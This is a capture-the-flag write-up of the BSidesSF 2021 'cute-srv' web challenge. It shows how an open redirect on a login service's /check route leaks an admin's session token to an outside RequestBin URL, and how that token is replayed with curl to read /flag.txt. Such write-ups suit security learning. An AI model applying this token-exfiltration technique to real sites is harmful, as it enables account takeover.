Check out [https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web- challenges.html#cute- srv](https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web- challenges.html#cute-srv) for writeup with images. \--- This challenge was fun, cute and straight-forward once the bug is found. First we're presented with a page of cute photos and the nav bar allows us to `Login` or `Submit` a new image for review. Looking in the source, there's a `/flag.txt` route which must be the goal of the challenge, but when visiting it we get a message `'Not Authorized'`. If we visit `Login` we can click the only link available and it will automatically log us in and redirect us to the main page. on `/submit` it gives us the ability to submit a URL which the admin will visit. This is typical in a lot of CSRF challenges, so we can start by checking the User-Agent and other features when it visits our link, pointing to a server we own or using something like [https://requestbin.io/](https://requestbin.io/). Even if we find XSS, the site is using HttpOnly cookies, so we probably need to find something else. Checking out the `Login` route again while watching the requests, it does something interesting. When requesting `/check` from the login service it will include the session token in the URL, but does not restrict which URL it redirects to. Using this bug we can force the Admin user to send their own session token to our site instead. We can use RequestBin again to steal the session token `authtok`, submitting this link to the admin: ``` https://loginsvc-0af88b56.challenges.bsidessf.net/check?continue=https%3A%2F%2Frequestbin.io%2F1oar7lu1 ``` Now we can reach the `/flag.txt` route which is only available to the admin: ``` curl https://cutesrv-0186d981.challenges.bsidessf.net/flag.txt \ -b 'loginsid=eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJhdXRodG9rIiwiZXhwIjoxNjE4NDYyMjkyLCJpYXQiOjE2MTU3ODM4OTIsImlzcyI6ImxvZ2luc3ZjIiwibmJmIjoxNjE1NzgzODkyLCJzdWIiOiJhZG1pbiJ9.iA3lgwhmhOPNKh0_Wxmi923EOWdcUWcS-cIA_lxPhtExEGMeGkep3zweJ-MXtFyOwiDnMZ7Uuyuth9mFQ0lpMQ' ``` And we get the Flag! ``` FLAG: CTF{i_hope_you_made_it_through_2020_okay} ``` Original writeup (https://fadec0d3.blogspot.com/2021/03/bsidessf-2021-web- challenges.html#cute-srv).